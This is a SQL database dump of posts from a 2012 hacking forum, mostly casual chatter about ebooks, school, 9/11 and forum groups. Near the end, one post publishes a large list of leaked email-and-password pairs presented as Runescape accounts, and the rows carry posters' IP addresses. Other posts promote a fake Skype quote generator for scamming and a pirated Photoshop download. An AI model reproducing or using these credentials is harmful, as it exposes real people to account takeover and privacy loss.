ebook explains even contains a video on how to do one of the method and you can get full support on LH on the technique so it\'s safe to buy this ebook. The second method is kinda unique but seems high rewarding. [font=Tahoma][size=large][b][color=#32CD32]Ease (5/5)[/color][/b][/size][/font] Both methods are easy, just require some patience. The first method is public and kinda saturated but you can earn shit loads of money. I would recommend 15+ to look forward to buy this ebook. [font=Tahoma][size=large][b][color=#32CD32]Layout (5/5)[/color][/b][/size][/font] Font and text size are easy to see and read, contains steps including pictures, includes author email for inquiries, white background but short yet well-explained ebook. This is a review of the ebook, we do not endorse or vouch for this ebook in any way. This my opinion and may vary with others.', '72.231.24.165', '1223104677', '1', '0', '1', '1347679608', '1', '8f7764b017827425ba2ab90f1e7106cb', '0', '1347679608'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2022', '38', '1994', '16', 'RE: [tut] How to lie like a pro', '0', '1', 't3h jok3r', '1347680167', '[quote=\'iTzIpod\' pid=\'1994\' dateline=\'1347675467\'] [quote=\'t3h jok3r\' pid=\'1990\' dateline=\'1347675210\'] [quote=\'iTzIpod\' pid=\'1856\' dateline=\'1347493805\'] Cool tutorial :3 I\'m not a good liar.. :/ [/quote] I use to be a good liar, I could look into eyes and lie. [/quote] LOL I can\'t even master that.. [/quote] If you read kevin mitnicks book and learn how to think fast then you would be able to lie like I do.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'aeeb835599b878e31b005fd925ca38aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2023', '38', '2022', '16', 'RE: [tut] How to lie like a pro', '0', '82', 'iTzIpod', '1347680592', '[quote=\'t3h jok3r\' pid=\'2022\' dateline=\'1347680167\'] [quote=\'iTzIpod\' pid=\'1994\' dateline=\'1347675467\'] [quote=\'t3h jok3r\' pid=\'1990\' dateline=\'1347675210\'] [quote=\'iTzIpod\' pid=\'1856\' dateline=\'1347493805\'] Cool tutorial :3 I\'m not a good liar.. :/ [/quote] I use to be a good liar, I could look into eyes and lie. [/quote] LOL I can\'t even master that.. [/quote] If you read kevin mitnicks book and learn how to think fast then you would be able to lie like I do. [/quote] Never heard of it before. Will Google Search it sometime.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f48dbb8e920cfefa923bf140cdc89397', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2024', '397', '1859', '42', 'RE: 11th Anniversary of 9/11', '0', '1', 't3h jok3r', '1347680684', 'RIP on whoever died in the incident that took place on 9/11 Off topic: ROFLOL, no one commented on this thread. How the fuck is this possible, I did comment before because I was too busy and thought this topic would be busy without me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dbdf97b96d667720b3d5c7f71ce1222b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2025', '164', '1334', '28', 'RE: Experiences on your upgrade..', '0', '1', 't3h jok3r', '1347680788', '[quote=\'Thunder™\' pid=\'1334\' dateline=\'1346260857\'] This Forums have already many active members and activity is good I hope i will contribute more :). [/quote] Thanks and good luck.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '776cccfbf6dec215f9e159f406d01514', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2026', '368', '1714', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '5', 'Timmy', '1347681035', 'Nice contest i would have gone for it but i don\'t sign up on sites so much so i don\'t need a custom LH forwarder but this does not mean that i will not be active', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5e9b77ec7740d329eca3af05e1e6d80a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2027', '406', '1886', '30', 'RE: Skype Fake Quote Generator', '0', '5', 'Timmy', '1347681074', 'Useful for scamming people :D JK, thanks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3be808fc8f7873de1d01a0efe7598cfc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2028', '426', '1940', '30', 'RE: [100% Virus Free] Photoshop CS5', '0', '5', 'Timmy', '1347681105', 'Link is down. Thanks tho and can you reupload?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f183025f1252755731f2deadf08c08ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2029', '406', '2027', '30', 'RE: Skype Fake Quote Generator', '0', '82', 'iTzIpod', '1347681912', '[quote=\'Timmy\' pid=\'2027\' dateline=\'1347681074\'] Useful for scamming people :D JK, thanks. [/quote] No problem! =] Enjoy!~/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f8c46df07d0050069fd7bece55fdb66', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2030', '426', '1940', '30', 'RE: [100% Virus Free] Photoshop CS5', '0', '82', 'iTzIpod', '1347682478', 'I will soon. Please be patient.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '193860444b74e20fdfc304f670f87aff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2031', '397', '2024', '42', 'RE: 11th Anniversary of 9/11', '0', '82', 'iTzIpod', '1347682956', '[quote=\'t3h jok3r\' pid=\'2024\' dateline=\'1347680684\'] RIP on whoever died in the incident that took place on 9/11 Off topic: [b]ROFLOL, no one commented on this thread. How the fuck is this possible, I did comment before because I was too busy and thought this topic would be busy without me.[/b] [/quote] I find this sadder than 9/11.... :(', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2a29d3e87a4b3ac4d1db6cc8882badf8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2032', '397', '1859', '42', 'RE: 11th Anniversary of 9/11', '0', '55', 'Baws', '1347683868', 'It sucks when people feel bad when 2000 people die in US, but not the millions around the world.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '411f519492f4a0facd17245b40565670', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2033', '420', '1927', '49', 'RE: [Suggestion] Mods/+ Can Edit Threads without the duration thing', '0', '1', 't3h jok3r', '1347683927', 'Mods, Staff and Elite have no time limit anymore.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '785ca1410e475aa3bd19342fe452ba36', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2034', '378', '1809', '7', 'RE: How is school for you?', '0', '55', 'Baws', '1347683949', '[quote=\'iTzIpod\' pid=\'1809\' dateline=\'1347392591\'] [quote=\'sirchamp\' pid=\'1802\' dateline=\'1347376465\'] Lol You have only one teacher?? I have for every subject a different teacher. Im going to a place called the gymnasium. A gymnasium is a school for the like 20% most clever kids of Switzerland. Yeahhh Switzerland.. You have to do a pretty hard test to join my school. So I go to school with lots of brainy kids -.- [/quote] I still go to elementary school. Grade 8. [/quote] Are you kidding me? LOL My school\'s fine I guess, I got a quiz first week of school, and book work! Woot? #Juniors year', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '89b447775b3e65caafe1c214b2aff3f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2035', '437', '2020', '3', 'RE: Help keep LH up', '0', '1', 't3h jok3r', '1347683967', '[quote=\'iTzIpod\' pid=\'2020\' dateline=\'1347679116\'] [quote=\'t3h jok3r\' pid=\'2019\' dateline=\'1347678869\'] Website Viewer? And fixed the link to L33THacking.net [/quote] As long as it\'s an adf.ly link and someone clicks on it, you still get money. :p [/quote] I have no idea what you are talking about.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7ed3e406384fb685fa0586796cae27aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2036', '412', '1892', '7', 'RE: 400th Thread', '0', '1', 't3h jok3r', '1347684295', 'I got an idea, why not make this a milestone thread? [b]Change of mind[/b] It\'s better to create a new thread for each milestone at the moment, this will increase our thread count and we will have more to discuss about.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2b09e001730e96f2b158d0d1c948c7cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2038', '64', '151', '23', 'RE: Securing your website', '0', '7', 'Romdu62', '1347684399', 'I like the layout and text colors. Ill use this for my website.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4f42d117f44f9ddcb5b17cfc7cfeac6e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2039', '345', '1983', '63', 'RE: Need userbar! [Gamers]', '0', '7', 'Romdu62', '1347684508', '[quote=\'NXK\' pid=\'1983\' dateline=\'1347665593\'] I don\'t know it\'s just the colors/ the font. I\'m not a fan of really dark things. [/quote] **Cough Cough** You have a black bg in your avatar ;) I think dark is better because white would hurt oru eyes', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'd3555c5da1d31a0df7053d2f4e455293', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2040', '437', '1995', '3', 'RE: Help keep LH up', '0', '53', 'sirchamp', '1347694522', 'I clicked all the links. But you wont earn much money with adf.ly . If you need money I wouldnt mind ads.', '188.155.56.90', '-1130678182', '1', '0', '53', '1347694556', '1', 'd7c70f34e8d361eccfc14451dc8b2b2d', '0', '1347694556'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2041', '38', '98', '16', 'RE: [tut] How to lie like a pro', '0', '53', 'sirchamp', '1347694633', 'I have that Book. Kevin Mitnick The Art of Deception.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'c0acf0e33805f4caad3746940921f0af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2042', '422', '1936', '19', 'RE: [Read] Announcement', '0', '62', 'R?????zo?', '1347702452', 'Thanks for doing this giveaways, it should be one of the rules of this group to NOT share anywhere else outside the group.', '95.69.114.198', '1598386886', '1', '0', '0', '0', '1', 'c68745ce7192cba5c37fb4dbf90574ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2043', '385', '1768', '19', 'RE: Discussion', '0', '62', 'R?????zo?', '1347703732', 'I don\'t want you to leave either, you are a really good member in my opinion, I\'ve read somewhere that you are busy with school but you should stick here, school comes first of course but even if your not active everyday , I\'m sure you can find time to leave a post or two sometime. And now that we just become friendly :P I don\'t want you to leave. Well it\'s your call anyways, but good luck to whatever your decision is :)', '95.69.114.198', '1598386886', '1', '0', '62', '1347703765', '1', '009b1511fb73a7c48d49422645025df0', '0', '1347703765'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2044', '431', '1979', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '62', 'R?????zo?', '1347706600', '[quote=\'t3h jok3r\' pid=\'1979\' dateline=\'1347664425\'] Size: Dunno Colour Scheme: Black, Red, Grey, Silver or white Render/Image: http://i410.photobucket.com/albums/pp181/GraphicDanny/blank-template.png Text: Admin Anything else: This is going to be the admin userbar. [/quote] [img]http://i.imgur.com/H8PtH.png[/img] Hope you like it. Let me know if you need anything changed. [hr] [quote=\'iTzIpod\' pid=\'1960\' dateline=\'1347650771\'] 1. Thanks for contributing to Unique. =] But I\'m fine for now. =] [/quote] Heres your request, hope you like it: [img]http://i.imgur.com/cEFV6.gif[/img]', '89.214.255.154', '1507262362', '1', '0', '62', '1347709701', '1', '19ad7b6a70f16eaca8dc0b9b67c13d22', '0', '1347709701'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2045', '397', '1859', '42', 'RE: 11th Anniversary of 9/11', '0', '82', 'iTzIpod', '1347711217', '9/11 = 11 years ago = 2000+ people die = Breaking News Africa = 10000+ people die from starvation... :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ed1a29afbf9901e725f510cdbb2536b9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2046', '437', '2035', '3', 'RE: Help keep LH up', '0', '82', 'iTzIpod', '1347711336', '[quote=\'t3h jok3r\' pid=\'2035\' dateline=\'1347683967\'] [quote=\'iTzIpod\' pid=\'2020\' dateline=\'1347679116\'] [quote=\'t3h jok3r\' pid=\'2019\' dateline=\'1347678869\'] Website Viewer? And fixed the link to L33THacking.net [/quote] As long as it\'s an adf.ly link and someone clicks on it, you still get money. :p [/quote] I have no idea what you are talking about. [/quote] I meant. L33thacking.com was still an Adf.ly link. And so if someone clicks on it, you can still get money. O_o But you changed it to L33thacking.net now so it doesn\'t matter.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '43e736802e3f34d317615ce90796fc52', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2047', '431', '2044', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '82', 'iTzIpod', '1347711463', '[quote=\'R?????zo?\' pid=\'2044\' dateline=\'1347706600\'] [quote=\'t3h jok3r\' pid=\'1979\' dateline=\'1347664425\'] Size: Dunno Colour Scheme: Black, Red, Grey, Silver or white Render/Image: http://i410.photobucket.com/albums/pp181/GraphicDanny/blank-template.png Text: Admin Anything else: This is going to be the admin userbar. [/quote] [img]http://i.imgur.com/H8PtH.png[/img] Hope you like it. Let me know if you need anything changed. [hr] [quote=\'iTzIpod\' pid=\'1960\' dateline=\'1347650771\'] 1. Thanks for contributing to Unique. =] But I\'m fine for now. =] [/quote] Heres your request, hope you like it: [img]http://i.imgur.com/cEFV6.gif[/img] [/quote] I can live with it. I don\'t really dig the font. But good job still. Thanks! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bdb255695d9fe46db73abf0f050a75c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2048', '434', '1981', '61', 'RE: Money Making eBook', '0', '82', 'iTzIpod', '1347711613', 'It\'s a different thread. This is 1 eBook. And the other thread was like 5+ I forgot how much...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '26d23c1119fe10a5649df562b53335c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2049', '412', '2036', '7', 'RE: 400th Thread', '0', '82', 'iTzIpod', '1347711707', '[quote=\'t3h jok3r\' pid=\'2036\' dateline=\'1347684295\'] I got an idea, why not make this a milestone thread? [b]Change of mind[/b] It\'s better to create a new thread for each milestone at the moment, this will increase our thread count and we will have more to discuss about. [/quote] We could make a section for that too? Make it a subforum in the Off Topic Section*.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd78cd121dddbd7f0e884fee304c19cdb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2050', '378', '2034', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347711866', '[quote=\'Baws\' pid=\'2034\' dateline=\'1347683949\'] [quote=\'iTzIpod\' pid=\'1809\' dateline=\'1347392591\'] [quote=\'sirchamp\' pid=\'1802\' dateline=\'1347376465\'] Lol You have only one teacher?? I have for every subject a different teacher. Im going to a place called the gymnasium. A gymnasium is a school for the like 20% most clever kids of Switzerland. Yeahhh Switzerland.. You have to do a pretty hard test to join my school. So I go to school with lots of brainy kids -.- [/quote] I still go to elementary school. Grade 8. [/quote] [b]Are you kidding me? LOL[/b] My school\'s fine I guess, I got a quiz first week of school, and book work! Woot? #Juniors year [/quote] Is there something wrong? I got 3 quizzes on the 2nd week of school. And 1 assignment on the first. And another one on the 2nd. Just finishing up now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fa00ca1ec1876ddc2c3fcad596c38f0b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2051', '439', '0', '58', 'Unique - Recruitment', '0', '82', 'iTzIpod', '1347712290', 'This is Unique\'s Recruitment thread. Please use the format below and post your application. Don\'t PM me about it or else I will deny it. Also, don\'t request a Join Request because I will deny those too. [b]Requirements[/b] [list] [*] Must have 15+ posts [*] Must have at least 3 threads (At least 1 tutorial, guide, ebook etc) [*] Must be HQ & Unique [*] Must contribute a lot to L33tHacking [/list] [b]Group Userbar[/b] [img]http://i.imgur.com/ceRsZ.gif[/img] [b]Forum Icon[/b] [img]http://l33thacking.net/uploads/ficons/CxrW3.png[/img] [b]Unique Group Application[/b] [code] [b]Name:[/b] [b]Age:[/b] [b]Username: [/b] [b]Profile Link:[/b] [b]Are you Unique?:[/b] [b]Are you HQ?:[/b] [b]Why do you wish to get into our group?:[/b] [b]What will you do to contribute to Unique?:[/b] [/code]', '24.212.197.164', '416597412', '1', '0', '82', '1348779632', '1', '903a7d705ea73a6e6ebbaf01d86a5418', '0', '1348779632'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2052', '440', '0', '74', '1300+ Runescape Accounts', '0', '82', 'iTzIpod', '1347712831', 'I found these accounts online. So if the password was changed, note that it was online. And could\'ve been used long time ago or something. I don\'t own these accounts. [spoiler][code] daniel525@hotmail.co.uk:dandanwww.warmingglobal@ymail.com:arber firewinn@live.com:654654 silver-drag0ns@hotmail.com:deslauriers habelinc@gmail.com:brooks skateboard_dude_18@hotmail.com:peuvent scrach17@gmail.com:tripwire ianizcool@gmail.com:fruity damoski_98@hotmail.com:muller ldyankee@comcast.net:cat123 paulvorobyev@gmail.com:winwin thesaltonater@gmail.com:frankie kopec.JB@seznam.cz:brenda i_r_bmx@hotmail.com:vodafone moultondustin@hotmail.com:snoots partymalich@aol.com:awesome calluml_24@live.com:twister monteirocod2@hotmail.com:galego ihatetheman2@yahoo.com:polos imanoob4life2010@hotmail.com:almost karapetazarian@yahoo.com:mikael devinincorp@yahoo.com:brock cuvie@hotmail.com:autoplay koltenakr@yahoo.com:kolten marlor09@hotmail.co.uk:letmein strbloods@hotmail.com:handsom strbloods@hotmail.com:handsom jacoterry@yahoo.com:050594 sabzeman@gmail.com:mehrdad raifieldc4@aim.com:orlando eelionkova@hotmail.com:kokko nick_space_rocks@hotmail.com:bigred kissup@gmx.us:sphere loganchad28@yahoo.com:12354 bombtoss@craiglondon.com:mithra---start of other guys log tierny 9:kanga cocioguy:coco11 danielwalker99@hotmail.com:blades andrew.mac123@hotmail.co.uk:busby carlohelder@hotmail.com:qazqaz1 wollaby23@hotmail.co.uk:laptop1 fallstownman@yahoo.com:rockies tdwpcc@hotmail.com:fuckyou10 sharkboy92008@hotmail.com:massive connor.clavin@live.com:shadow12 austinsweat@yahoo.com:skateboard joao_figueiredo1@hotmail.com:corleone djscorch18@gmail.com:theonly1 ante_pain@hotmail.com:rammstein casey_howlett@live.com:truck logan_rocque@hotmail.com:justin22 matty789uk@hotmail.co.uk:alice123 young_soldier3@yahoo.com:soccer3 dfar13@yahoo.com:darkstar1 marijndelaat@home.nl:bolster swimtoomuch197@aim.com:downing dillbell2k9@hotmail.co.uk:noonoo kazukixx@hotmail.com:spiker dombo_ikke_@hotmail.com:dominic vinceduca1a@hotmail.com:abcd1234 nico_lodewijks@hotmail.com:neptunes prfjpl@aol.com:ben Jackalexauty@yahoo.co.uk:willow dan_town@hotmail.co.uk:henleys edgaras98@gmail.com:scimitar jakeryan15@hotmail.co.uk:nutter abert_23@hotmail.com:blackdog MGS360@googlemail.com:andreas thbonzo@hotmail.com:030393 labdor6@yahoo.com:chris1 Drago_edge@hotmail.com:winace synystersimonninjashizzle@hotmail.co.uk:smeghead ryanthelion010@hotmail.co.uk:temple jamiecarter95@hotmail.co.uk:awesome repcal@live.com:halld Jann_@live.be:071194 ville.anttonen@hotmail.com:033196 khoury.russell@yahoo.com:phoenix brett@flettre.com:159111 ronakp93@yahoo.com:lemon lukebhardy@hotmail.com:190491 lil-shit23@hotmail.com:passw0rd kanewright@live.co.uk:caine mkmmsrk@yahoo.com:awsome robbe.bormans@hotmail.com:147896325 crouse6684@comcast.net:alive rockontyler@hotmail.com:midnight aditya.29@hotmail.com:immortal liland@verizon.net:butthole snake4444100@yahoo.com:298570 Samboni@btinternet.com:wicked1 glibberpudding@msn.com:donald matchuC@yahoo.com:04041994 robsonlpark@hotmail.com:chester kittykitty1000@hotmail.com:munchkin jbailey191@gmail.com:panther marc_1411_95@hotmail.com:cassis gargaros@live.com:danger codybole@yahoo.com:suzuki andre.as.henrik.sson@hotmail.com:q1w2e3r4 ponyboyandy@aol.com:shredder nick_da_man180@hotmail.com:aenima troyaaron11@yahoo.com:shark ryanreble@msn.com:maxie bjg33@hotmail.com:plate chaserulz0423@hotmail.com:charlie1 weil59@hotmail.co.uk:submit w3x1337@hotmail.com:svensson Lafk8fish@gmail.com:asdf123 mentoboy45@hotmail.co.uk:haman dogking2@hotmail.com:daewoo c.duffer@yahoo.com:chance ejbmal518@yahoo.co.nz:jeremiah heladoboy@gmail.com:102893 takktanel@gmail.com:kapral wesdeking@hotmail.com:wes ijaazmgp@hotmail.com:stronger affan121@hotmail.com:muhammad adamcollins307@hotmail.co.uk:everton brhotwheels@sbcglobal.net:ridgeway cborangeapple@gmail.com:colt45 krissytof@hotmail.com:memories nantha_kumar99@yahoo.com:09011984 goto.tyan@gmail.com:lemonade tobiasm9@yahoo.com:10041996 laurensperdok@gmail.com:laurens niqqaplox@hotmail.com:friend lil7phil@yahoo.com:abcd1234 xownedploxx@live.com:crawdad puppyskater12@gmail.com:devourment hsteele13@yahoo.com:redred football_lorenzo@hotmail.com:gibson horribleballers@gmail.com:online devon_snow16@hotmail.com:snickers mjmcbride1@msn.com:abc321 jallenrausch@hotmail.com:killed three-n9runners@hotmail.com:bartek dellgateway101@yahoo.com:green1 dallas59@ymail.com:fungis antoniogonzalez97@hotmail.com:azsxdc ajschaefs@gmail.com:marty baaangwtf@hotmail.com:robbie cmac-@hotmail.com:cynthia murat-yargin@hotmail.com:roadster ------------------------------------...east@yahoo.com:slayer12 goldendefense@yahoo.com:chitty joeymadzai@yahoo.com:nightman maxpowner@hotmail.com:aqwzsx jesssicaftw@hotmail.com:superman123 jdinodino@yahoo.com:dynasty1 Jasperfarmer@live.com:Jazzband potenagle@hotmail.com:123544 bug390@live.ca:12stars chris_mizuguchi@hotmail.com:417245 evonic@live.ca:wonders t--murphy@hotmail.com:coughup vfdc2@hotmail.com:juggalo sifu_magic@yahoo.com:redred Simon_Hunley@hotmail.com:kern12 brandonraymartin@yahoo.com:brandon321 pwnr4nge@hotmail.com:miamoo james_cos97@hotmail.com:cossie themikeyspikey@hotmail.com:scampie abc_345@live.com:1234567a nickeos@live.ca:pretty1 kylefguy@hotmail.co.uk:1234qwer Nuclearwasteland@yahoo.com:idontcare bowdsters@hotmail.ca:helpyou joshdiazz@yahoo.com:addadd iownuz@live.com.au:eternity WorldofAQ@yahoo.com:wootwoot mineoit@hotmail.com:p0k3m0n the_great_one45@hotmail.com:44magnum mitchelj97@hotmail.com:superman123 guitardude29@live.com:dumdum bellodarren@yahoo.com:pimpin1 kundingerlink@yahoo.com:159753852456 liamrocks816@hotmail.com:kahnawake spamfrodo@yahoo.com:billyboy jericho_71@hotmail.com:pimp22 turners_2_fast@hotmail.com:staples randallewalker@yahoo.com:usuck12 josta11@live.nl:bounty123 sikky14@hotmail.com:northeast1 timmmettje@hotmail.com:jens123 benjeeez@yahoo.co.nz:friendz Damien2763@hotmail.com:acer123 connor_003@hotmail.com:abyss3 mattieworks23@live.nl:compaq1 merchant.69@hotmail.com:honker Braedynashley@hotmail.com:scooters ihave3parakeets@yahoo.com:matthew89 dragonx566@yahoo.com:278566 mewesley64@hotmail.com:cat3rpillar 